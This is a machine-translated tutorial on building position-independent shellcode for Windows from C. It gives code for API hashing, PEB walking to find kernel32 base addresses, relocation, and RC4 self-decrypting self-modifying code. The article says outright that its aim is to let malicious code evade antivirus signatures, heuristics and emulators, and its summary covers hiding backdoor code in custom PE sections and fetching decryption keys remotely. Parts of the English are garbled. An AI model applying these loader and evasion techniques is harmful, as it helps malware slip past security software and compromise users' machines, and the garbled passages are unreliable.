Advanced shellcode Programming Technology on windows
Preface
Concept of binary function shellcode
3. Selection of advanced languages
Iv. x86 c2shellcode framework
5x64 c2shellcode framework
Summary
7. Thank you
Preface
The technology described in this article has been used in practice for a long time, but it has not been documented for some reasons. This article provides code implementation for the key points and adds some new understandings from the author.
The directory structure of the test code is as follows:
Test1: 32-bit 64-bit shellcode and corresponding test tool
Test2: x86 c2shellcode framework
Test3: shellcode writing skills of the dup command placeholder. text Segment
Test4: implement secondary SMC of shellcode
Test5: x64 c2shellcode framework
Concept of binary function shellcode
This is an age of intense attack and defense. Anti-Virus Software's detection and removal technology is three-dimensional, with signatures, clouds, home defenses, inspiration, and virtual machines. If the malicious code is restricted to a fixed PE format, it cannot be quickly muttered or killed. This requires that the malicious code should be able to escape static detection after simple processing, and the loader of windows can be loaded and run independently. Shellcode exactly fits this form. The shellcode mentioned in this article is not a shellcode that is traditionally used in scenarios where the length is prone to demanding requirements, but may contain thousands or tens of thousands of lines of source code, however, when the EIP of CopyMemory points to the past, the binary code that runs can be loaded, which is called the functional shellcode. Obviously, because of the number of lines of code or functional requirements, it is not cost-effective to write functional shellcode using pure assembly.
3. Selection of advanced languages
1. Use delphi to write the functional shellcode
Currently, the popular shellcode compiler is mainly delphi and vc. A Brief Introduction to delphi: Due to the Borland compiler, the string constant is not placed in the Data Segment during compilation, but behind the function. It is much easier to process strings than VC, in addition, delphi supports X64 inline assembly, making it even more powerful to write X64 shellcode. Early predecessors in the circle, such as Anskya (Queen) xfish, generally use delphi to compile functional shellcode.
2. Use VC to write the functional shellcode
The test1 directory contains two binary codes: 32shellcode. bin and 64shellcode. bin. There are two segments of shellcode that can run on x86 and x64 respectively. You can enable the debugview tool to capture logs. Run the following command to test two segments of shellcode.
32runbin.exe 32shellcode. bin
64runbin.exe 64shellcode. bin
If it is an x64 system, 32shellcode. bin will also run very robust on wow64.
Next we will introduce the functional shellcode written by VC.
Iv. x86 c2shellcode framework
1 c2shellcode framework Overview
This is a 32-bit shellcode framework generated using VS2008. You can easily call native APIs and ring3 APIs in shellcode. After the HHL_DEBUG switch is commented out, run the generated EXE to generate shellcode.
Let's take a look at this project.
void main(){#ifdef HHL_DEBUG InitApiHashToStruct(); ShellCode_Start();#else InitApiHashToStruct();#endif}
The Main function is simple and defines a debugging switch. This debug switch affects the global structure of ShellData. When this switch is commented out, ShellData will be attached to the tail of shellcode. Enabling ShellData exists in the. data Segment to facilitate C source code Debugging Using vc ide.
2. Function execution process after the HHL_DEBUG debug switch is enabled
2.1 fill in the hash function into the ShellData struct
The first is the InitApiHashToStruct function. Here is a more traditional shift generation hash function, you can call GetRolHash to directly pass the string for hash generation, or you can batch directly fill the hash into the ShellData struct.
DWORD GetRolHash(char *lpszBuffer){ DWORD dwHash = 0; while(*lpszBuffer) { dwHash = ( (dwHash <<25 ) | (dwHash>>7) ); dwHash = dwHash+*lpszBuffer; lpszBuffer++; } return dwHash;}
2.2 scan and export the table based on the function hash to obtain the function address
The ShellCode_Start function directly redirects to ShellCodeEntry and starts to execute shellcode.
__declspec(naked) void ShellCode_Start(){ __asm { jmp ShellCodeEntry }}
Note that the local string is defined in the ShellCodeEntry function. Check with IDA.
PVOID ShellCodeEntry(){ char hhl[]={'h','e','l','l','o','g','i','r','l',0};#ifndef HHL_DEBUG DWORD offset=ReleaseRebaseShellCode(); PShellData lpData= (PShellData)(offset + (DWORD)Shellcode_Final_End);#endif GetRing3ApiAddr(); lpData->xOutputDebugStringA(hhl); return (PVOID)lpData;}
We can see that the defined string in this way is the parameter transfer in the. text Segment by means of the Pressure stack, rather than in the. data Segment.
The GetRing3ApiAddr function is mainly responsible
1. Get the kernel32 base address through the get_k32base_peb () function.
2. Use the get_ntdllbase_peb () function to obtain the base address of ntdll. You can also directly use the LoadLibrary function to load ntdll.
3. Obtain the addresses of loadlibrary and getprocaddress functions.
4. Load other required modules, such as paspi advapi32, to obtain the base address.
5. Pass the hash of the specified function and the base address of the specified module to the Hash_GetProcAddress function, parse and export the table, obtain the address of the specified function, and fill it in the ShellData struct.
__declspec(naked) DWORD get_k32base_peb(){ __asm { mov eax, fs:[030h] test eax,eax js finished mov eax, [eax + 0ch] mov eax, [eax + 14h] mov eax, [eax] mov eax, [eax] mov eax, [eax + 10h]finished: ret }}
This code can be used to obtain the basic address of kernel32 in winxp-win8.1.
2.3 pass related parameters and call the function address to implement corresponding functions.
Finally, OutPutDebugStringA is called to test the shellcode output by a string.
LpData-> xOutputDebugStringA (hhl );
3. Block the function execution process after the HHL_DEBUG debug switch.
#ifndef HHL_DEBUG dwSize = (DWORD)Shellcode_Final_End - (DWORD)ShellCode_Start; dwShellCodeSize = dwSize + sizeof(TShellData); lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED,dwShellCodeSize); if(lpBuffer) { CopyMemory(lpBuffer,ShellCode_Start,dwSize); CopyMemory(lpBuffer+dwSize,&ShellData,sizeof(TShellData)); hFile = CreateFileA("GetRing3ApiAddr.bin", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0); if(hFile != INVALID_HANDLE_VALUE) { if(WriteFile(hFile,lpBuffer,dwShellCodeSize,&dwBytes,NULL)) { printf("Save ShellCode Success.\n"); } CloseHandle(hFile); } GlobalFree(lpBuffer); }#endif
We can see that after the HHL_DEBUG switch is commented out, we just copied the specified memory area. But how do we determine which region to copy.
4. How to Determine the start and end of Shellcode
Drag the generated PE file to IDA, and you can see the start and end addresses of the binary code.
You only need to copy the ShellCode_Start to the end of the InitApiHashToStruct function.
5 c2shellcode notes
1. the jump-related commands should be relatively redirected,
2. Avoid storing strings in. data segments.
3. Properly process global variables.
In the c2shellcode framework, global variables are stored in TShellData. Then, through relocation, the lpData pointer is used for indexing for shellcode to call. When TShellData is indexed, it needs to be relocated. The relocated function is ReleaseRebaseShellCode.
DWORD ReleaseRebaseShellCode(){ DWORD dwOffset; __asm { call GetEIPGetEIP: pop eax sub eax, offset GetEIP mov dwOffset, eax } return dwOffset;}
The pointer is indexed to TShellData by adding the relevant offset to store the global variables of shellcode.
1
PShellData lpData = (PShellData) (offset + (DWORD) Shellcode_Final_End );
Index tshelldata
6 advantages of using advanced languages to write shellcode
The advantage of writing shellcode in advanced languages is that you do not need to care about the stack balance, and you can use the compilation optimization option to reduce the shellcode size when generating shellcode.
Debugging has extremely powerful advantages. You only need to care about the implementation of malicious code functions, and you do not need to worry about trivial details. For example, whether the function address can be correctly obtained can greatly enhance the readability of the source code. It shows the shellcode debugging Based on C source code in the vc ide after loading the symbol table. You can see at a glance whether the function address in the struct has been correctly filled.
7 shellcode coding skills for C call ASM and dup command placeholder text segments
The c2shellcode framework in Test2 attaches the global struct to the end of shellcode, but this is not necessary. The VC compiler allows asm call c and c call asm. This function supports 32-bit and 64-bit platforms and the related code is in the test3 directory.
. 386
. Model flat, c
. Code
Public AsmShellData
Public AsmChar
Public hellohhl
AsmShellData proc
Byte 2000 dup (8)
AsmShellData endp
AsmChar proc
Byte 2000 dup (6)
AsmChar endp
Hellohhl proc
Sztext db 'hellohhl', 0
Hellohhl endp
End
This is the compilation code.
In AsmShellData, the dup command occupies a placeholder for the. text Segment, occupying 2000 bytes.
0 is not recommended for placeholder here, because an additional. bss segment will be added when the obj file is linked. 0 indicates no initialization. The. bss segment is used to store data that is not initialized.
We can see several newly exported functions in the ASM file.
AsmShellData dup command placeholder is used to store global variables of shellcode.
The AsmChar dup command placeholder is used to store the global string of shellcode.
Hellohhl is used to mark the end of shellcode.
Note that two new macros are defined.
# Define shellcode_final_end hellohhl
# Define shellcode_final_start ShellCode_Start
Why is that defined. Load IDA.
We can clearly see the start and end of shellcode. You only need to copy the shellcode_start code to hellohhl to get the shellcode.
#ifndef HHL_DEBUG b1=VirtualProtect(AsmShellData,sizeof(TShellData),PAGE_EXECUTE_READWRITE,&dwOldProtect); CopyMemory(AsmShellData,&ShellData,sizeof(TShellData)); dwSize = (DWORD)shellcode_final_end - (DWORD)shellcode_final_start; lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED,dwSize); if(lpBuffer) { CopyMemory(lpBuffer,shellcode_final_start,dwSize); hFile = CreateFileA("hhlsh.bin", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); if(hFile != INVALID_HANDLE_VALUE) { if(WriteFile(hFile,lpBuffer,dwSize,&dwBytes,NULL)) { printf("Save ShellCode Success.\n"); } CloseHandle(hFile); } GlobalFree(lpBuffer); }#endif
Because the placeholder AsmShellData using the dup command is located in. in the text segment, you must first use VirtualProtect to change the Memory attribute, and then copy the global variables into this space. You still need to relocate the code, but this time you can point the pointer to AsmShellData.
#ifndef HHL_DEBUG DWORD offset=ReleaseRebaseShellCode(); PShellData lpData= (PShellData)((DWORD)AsmShellData+offset); #endif
We can see that the memory is allocated only once, and we do not need to copy the ShellData struct to the end of shellcode.
8. Implement SMC multiple times in shellcode
You may find that shellcode is based on SMC technology from the very beginning. A large piece of code segment stores hash, and this piece of code segment that stores hash will modify itself into a function address during running, but you may not be completely satisfied with the technology of a single SMC.
I do not intend to use the traditional xor encryption method for self-decryption of shellcode. This time, we use standard RC4 for shellcode self-decryption. This project is located in the test4 directory. You can observe how to add code to c2shellcode. If you want to, you can set some conditions to write a loop so that shellcode can be decrypted by 4 bytes. I believe this will increase the threshold for reverse analysis.
In the shellcode_ntapi_utility.h header file, we added two new RC4 encryption and decryption functions for shellcode to call.
We use hellogirl as the key to encrypt the hash region when generating the shellcode.
At the beginning of shellcode Execution, the hash region is decrypted one by one, and the hash region is restored to the original API address by SMC again.
Run runbin.exe hhlsh. bin shellcode to use RC4 to output the familiar string from debugview again after self-decryption.
The related code is in the test4 directory and will not be analyzed in detail here.
5x64 c2shellcode framework
I do not recommend that you mix a 32-bit project and a 64-bit project with preprocessing instructions in the same project.
The 64-bit c2shellcode is located in the test5 Directory, which is different from the 32-bit shellcode.
We will continue to introduce the c2shellcode framework below x64 from the main function.
void main(){#ifdef HHL_DEBUG InitApiHashToStruct(); AlignRSPAndCallShEntry();#else InitApiHashToStruct();#endif}
Like the 32-bit c2shellcode framework, the InitApiHashToStruct function is used to populate the hash data into the ShellData struct.
The entry function of shellcode is a function exported from ASM.
First, let's take a look at the code in the asm file. The AlignRSPAndCallShEntry function is responsible for making a 16-bit alignment. Otherwise, the program will Crash once the 128-bit XMM register is called. Execute the 64-bit shellcode directly after the alignment is completed.
EXTRN ShellCode_Entry:PROC ;this function is in cPUBLIC AlignRSPAndCallShEntry AlignRSPAndCallShEntry PROC push rsi mov rsi, rsp and rsp, 0FFFFFFFFFFFFFFF0h sub rsp, 020h call ShellCode_Entry mov rsp, rsi pop rsi ret AlignRSPAndCallShEntry ENDP
You can see that in the AlignRSPAndCallShEntry function, with the help of asm call c, we return to the C function ShellCode_Entry to start code execution.
PVOID ShellCode_Entry(){ char hhl[]={'h','e','l','l','o','h','h','l',0};#ifndef HHL_DEBUG PShellData lpData= (PShellData)((ULONG64)Shellcode_Final_End)#endif GetRing3ApiAddr(); lpData->xOutputDebugStringA(hhl); return (PVOID)lpData;}
In the 64-bit above, we still need to get the base address of kernel32 and then parse and export the table to get the address of the relevant function.
PUBLIC get_kernel32_peb_64get_kernel32_peb_64 PROCmov rax,30hmov rax,gs:[rax] ;mov rax,[rax+60h] ;mov rax, [rax+18h] ;mov rax, [rax+10h] ;mov rax,[rax] ;mov rax,[rax] ;mov rax,[rax+30h] ;DllBaseretget_kernel32_peb_64 ENDP
The above code can be more common on the X64 win7-win8.1 system above get the kernel32 base address.
We still need to relocate the shellcode when removing the HHL_DEBUG switch to generate the shellcode. Because of the relative addressing of RIP under the 64-bit processor, we only need to use the end region of shellcode to determine the ShellDat as the global variable.
PShellData lpData = (PShellData) (ULONG64) Shellcode_Final_End );
When the shellcode is generated, we only need to copy the binary code of the specified region to the shellcode. Here, we still use the method that ShellData attaches to the tail of shellcode to process global variables. If you want to, you can still use the dup command to process global variables in the placeholder text segment.
dwSize = (ULONG64)Shellcode_Final_End - (ULONG64)Shellcode_Final_Start; dwShellCodeSize = dwSize + sizeof(TShellData); lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED,dwShellCodeSize); if(lpBuffer) { CopyMemory(lpBuffer,Shellcode_Final_Start,dwSize); CopyMemory(lpBuffer+dwSize,&ShellData,sizeof(TShellData)); hFile = CreateFileA("64shellcode.bin", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); if(hFile != INVALID_HANDLE_VALUE) { if(WriteFile(hFile,lpBuffer,dwShellCodeSize,&dwBytes,NULL)) { printf("Save ShellCode Success.\n"); } CloseHandle(hFile); } GlobalFree(lpBuffer); }
Still on IDA.
PUBLIC MyShellCodeFinalEndMyShellCodeFinalEnd PROC xor rax,rax retMyShellCodeFinalEnd ENDPEND
We can see that the binary value between ShellCode_Start and MyShellcodeFinalEnd is shellcode.
Summary
If you can read c2shellcode, you will feel that c2shellcode is nothing new. With some features of the compiler (for example, inline compilation dup command placeholder text segment), start and end of the global string variable shellcode are easily processed.
What is shellcode or code or data is shellcode as long as the binary code is irrelevant to the location. No matter what compiler you use, the GCC or the delphi compiler or the VC compiler, as long as the binary output is irrelevant to the location or the binary output is irrelevant to the location through post-processing, it is shellcode.
The functional shellcode is mainly used to quickly defend against anti-virus software.
Malicious Code is encapsulated into the shellcode protection code and cloud
Code self-modification technology multi-layer SMC confrontation inspiration and virtual machines and clouds
Random Code segment and PE structure. Fight Against Soft PE Structure detection and removal and cloud
Whitelist technology defends against foreign anti-DDoS attacks
1. About Multi-layer SMC
Because the hash region (ShellData) storing this API address needs to be decrypted multiple times (key) to restore the real API address. In addition, the api addresses of malicious code are all derived from the ShellData region. We can easily write the key into a registry key value or binfile, or collect packets from the network to receive the key for SMC, soft killer virtual machines cannot simulate API calls with malicious code.
2. About the random code segment and PE structure.
The following command is used for existing methods.
# Pragma code_seg (push, r2, ". test ")
Some your backdoor code
# Pragma code_seg (pop, r2)
Add your malicious code to A. test segment or use the following command to merge the segments.
# Pragma comment (linker, "/MERGE:. rdata =. data") // MERGE rdata segments into data segments
# Pragma comment (linker, "/MERGE:. text =. data") // MERGE text segments into data segments
# Pragma comment (linker, "/MERGE:. reloc =. data" // MERGE reloc segments into data segments
It is easy to determine that the PE is manually modified and will be inspired to take the PE structure.
The dup command occupies the. text Segment and works with SMC to control almost every byte of malicious code.